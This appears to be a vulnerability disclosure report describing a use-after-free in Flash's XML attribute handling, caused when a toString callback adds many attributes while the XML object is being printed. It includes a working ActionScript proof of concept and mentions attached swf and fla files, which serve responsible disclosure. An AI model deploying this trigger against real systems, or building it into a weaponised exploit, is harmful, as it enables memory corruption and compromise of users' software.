If an XML attribute is set to an object that has toString defined, it can lead to a use-after-free condition if the toString function adds many attributes to the XML object while it is being printed. This happens because adding extra attributes eventually causes the buffer that contains the object variables to be reallocated. 

A minimal proof of concept is as follows:

var doc:XML = new XML("<mytag name='Val'> item </mytag>");
trace(doc.firstChild.attributes.name); // Val
trace (doc.firstChild); // <mytag order="first" name="Val"> item </mytag>

var n = {toString : s, valueOf : s};

for (attr in doc.firstChild.attributes) {
    trace (attr + " = " + doc.firstChild.attributes[attr]);
}

var q = doc.firstChild.attributes;
for(var i = 0; i < 100; i++){
	q[i] = "t"; // Make the var buffer big, so it doesn't immediately get reallocated as a simple object (which zeros its values)
	}
trace(doc.toString());
doc.firstChild.attributes.natalie = n;
trace(doc.toString());

function s(){
	
	trace("hello");
	doc.firstChild.attributes.order1 = "a";
	doc.firstChild.attributes.name2 = "a";
	doc.firstChild.attributes.natalie1 = "a";
	doc.firstChild.attributes.order3 = "a1";
	doc.firstChild.attributes.b = "a2";
	doc.firstChild.attributes.order;
	var q = doc.firstChild.attributes;
	for(var i = 0; i < 1000; i++){
		q[i] = "t";
		
		}
	return "myString";	
	}

A sample swf and fla are attached. This PoC only works on 64-bit Linux (probably due to pointer size affecting what gets reallocated in the freed area), but the use-after-free condition should occur on all platforms.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 

xmlattribs.fla 4.8 KB Download

xmlattribs.swf 914 bytes Download